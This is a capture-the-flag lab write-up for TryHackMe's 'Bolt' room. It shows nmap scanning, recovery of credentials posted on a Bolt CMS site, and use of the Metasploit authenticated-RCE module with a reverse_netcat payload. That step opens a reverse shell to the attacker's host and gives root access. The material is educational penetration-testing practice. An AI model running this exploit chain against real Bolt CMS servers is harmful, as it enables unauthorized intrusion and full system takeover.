THM Writeup – Bolt

THM Writeup – Bolt

THM Writeup - Bolt

A hero is unleashed

Room: Bolt

Difficulty: Easy

Operating System: Linux

Author: 0x9747

This room is designed for users to get familiar with the Bolt CMS and how it can be exploited using Authenticated Remote Code Execution. You should wait for at least 3-4 minutes for the machine to start properly.

Add IP address to your hosts file:

echo '10.10.17.193    bolt.thm' >> /etc/hosts

Scan the target machine – find open ports first:

nmap -n -Pn -sS -p- --open -min-rate 5000 -vvv bolt.thm

PORT     STATE SERVICE  REASON
22/tcp   open  ssh      syn-ack ttl 64
80/tcp   open  http     syn-ack ttl 64
8000/tcp open  http-alt syn-ack ttl 64

Get more details about open ports:

nmap -T4 -A -p 22,80,8000 bolt.thm

22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f3:85:ec:54:f2:01:b1:94:40:de:42:e8:21:97:20:80 (RSA)
|   256 77:c7:c1:ae:31:41:21:e4:93:0e:9a:dd:0b:29:e1:ff (ECDSA)
|_  256 07:05:43:46:9d:b2:3e:f0:4d:69:67:e4:91:d3:d3:7f (EdDSA)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8000/tcp open  http    PHP 7.2.32-1
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 Not Found
|     Date: Fri, 05 Aug 2022 06:00:11 GMT
|     Connection: close
|     X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
|     Cache-Control: private, must-revalidate
|     Date: Fri, 05 Aug 2022 06:00:11 GMT
|     Content-Type: text/html; charset=UTF-8
|     pragma: no-cache
|     expires: -1
|     X-Debug-Token: a2cab2
|     <!doctype html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Bolt | A hero is unleashed</title>
|     <link href="https://fonts.googleapis.com/css?family=Bitter|Roboto:400,400i,700" rel="stylesheet">
|     <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
|     <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
|     <meta name="generator" content="Bolt">
|     </head>
|     <body>
|     href="#main-content" class="vis
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Date: Fri, 05 Aug 2022 06:00:11 GMT
|     Connection: close
|     X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
|     Cache-Control: public, s-maxage=600
|     Date: Fri, 05 Aug 2022 06:00:11 GMT
|     Content-Type: text/html; charset=UTF-8
|     X-Debug-Token: 069ac2
|     <!doctype html>
|     <html lang="en-GB">
|     <head>
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Bolt | A hero is unleashed</title>
|     <link href="https://fonts.googleapis.com/css?family=Bitter|Roboto:400,400i,700" rel="stylesheet">
|     <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
|     <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
|     <meta name="generator" content="Bolt">
|     <link rel="canonical" href="http://0.0.0.0:8000/">
|     </head>
|_    <body class="front">
|_http-generator: Bolt
|_http-title: Bolt | A hero is unleashed

We have 3 ports open: 22 (SSH – Secure Shell), 80 (HTTP – Apache server), 8000 (HTTP – Bolt CMS)

Check the application on port 8000 – browse to http://bolt.thm:8000/

Bolt CMS

By scrolling down a little bit we found a post from Jake with his password:

Jake's message for IT Department

Scroll down a little bit again and find another message from Jake revealing his username:

Jake's message for everyone

Let’s find login page now – google bolt cms login page:

bolt cms login page search results

By clicking Bolt Documentation link we found out login page is at http://mydomain.com/bolt

Bolt CMS documentation login page

So browse to http://bolt.thm:8000/bolt – and we are at login page:

Bolt CMS login page

Login to the CMS with the username and password we found earlier:

Bolt CMS Dashboard

At the bottom left we see the CMS version.

Now browse to https://www.exploit-db.com/ and search for bolt cms:

exploit database bolt cms search results

Click the Authenticated Remote Code Execution exploit and find the EDB-ID:

Bolt CMS - Authentication RCE

Another way how to find out the EDB-ID is using searchsploit:

root@attackbox:~# searchsploit bolt

---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
Apple WebKit - 'JSC::SymbolTableEntry::isWatc | multiple/dos/41869.html
Bolt CMS 3.6.10 - Cross-Site Request Forgery  | php/webapps/47501.txt
Bolt CMS 3.6.4 - Cross-Site Scripting         | php/webapps/46495.txt
Bolt CMS 3.6.6 - Cross-Site Request Forgery / | php/webapps/46664.html
Bolt CMS 3.7.0 - Authenticated Remote Code Ex | php/webapps/[REDACTED].py
Bolt CMS < 3.6.2 - Cross-Site Scripting       | php/webapps/46014.txt
Bolthole Filter 2.6.1 - Address Parsing Buffe | multiple/remote/24982.txt
BoltWire 3.4.16 - 'index.php' Multiple Cross- | php/webapps/36552.txt
BoltWire 6.03 - Local File Inclusion          | php/webapps/48411.txt
Cannonbolt Portfolio Manager 1.0 - Multiple V | php/webapps/21132.txt
CMS Bolt - Arbitrary File Upload (Metasploit) | php/remote/38196.rb
---------------------------------------------- ---------------------------------

As you can see the exploit filename is the EDB-ID…

Run metasploit:

msfconsole

Search for the bolt exploits:

msf5 > search bolt

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/multi/http/bolt_file_upload         2015-08-17       excellent  Yes    CMS Bolt File Upload Vulnerability
   1  exploit/unix/webapp/[REDACTED]  2020-05-07       excellent  Yes    Bolt CMS 3.7.0 - Authenticated Remote Code Execution

Now we have full path for the Authenticated Remote Code Execution exploit…

Select (use) the Authenticated Remote Code Execution exploit and set LHOST, RHOST, USERNAME, PASSWORD:

msf5 > use 1
[*] Using configured payload cmd/unix/reverse_netcat
msf5 exploit(unix/webapp/[REDACTED]) > show options

Module options (exploit/unix/webapp/[REDACTED]):

   Name                 Current Setting        Required  Description
   ----                 ---------------        --------  -----------
   FILE_TRAVERSAL_PATH  ../../../public/files  yes       Traversal path from "/files" on the web server to "/root" on the server
   PASSWORD                                    yes       Password to authenticate with
   Proxies                                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                8000                   yes       The target port (TCP)
   SRVHOST              0.0.0.0                yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT              8080                   yes       The local port to listen on.
   SSL                  false                  no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI            /                      yes       Base path to Bolt CMS
   URIPATH                                     no        The URI to use for this exploit (default is random)
   USERNAME                                    yes       Username to authenticate with
   VHOST                                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   Linux (cmd)


msf5 exploit(unix/webapp/[REDACTED]) > set LHOST 10.10.167.139
LHOST => 10.10.167.139
msf5 exploit(unix/webapp/[REDACTED]) > set RHOST bolt.thm
RHOST => bolt.thm
msf5 exploit(unix/webapp/[REDACTED]) > set USERNAME [REDACTED]
USERNAME => [REDACTED]
msf5 exploit(unix/webapp/[REDACTED]) > set PASSWORD [REDACTED]
PASSWORD => [REDACTED]

LHOST = your attacking machine IP address

Now run the exploit and find the flag:

msf5 exploit(unix/webapp/[REDACTED]) > run

[*] Started reverse TCP handler on 10.10.167.139:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Successfully changed the /bolt/profile username to PHP $_GET variable "rllcy".
[*] Found 2 potential token(s) for creating .php files.
[+] Deleted file qwcfhipmyai.php.
[+] Used token a741faa0358fbf956f4560578f to create hdfscjytaf.php.
[*] Attempting to execute the payload via "/files/hdfscjytaf.php?rllcy=`payload`"
[*] Command shell session 1 opened (10.10.167.139:4444 -> 10.10.68.75:46752) at 2022-08-05 08:19:33 +0100
[!] No response, may have executed a blocking payload!
[+] Deleted file hdfscjytaf.php.
[+] Reverted user profile back to original state.

id
uid=0(root) gid=0(root) groups=0(root)
pwd
/home/bolt/public/files
cd /home
ls
bolt
composer-setup.php
flag.txt
cat flag.txt
THM{[REDACTED]}

Do you like this writeup? Check out other THM Writeups.

Comments are closed.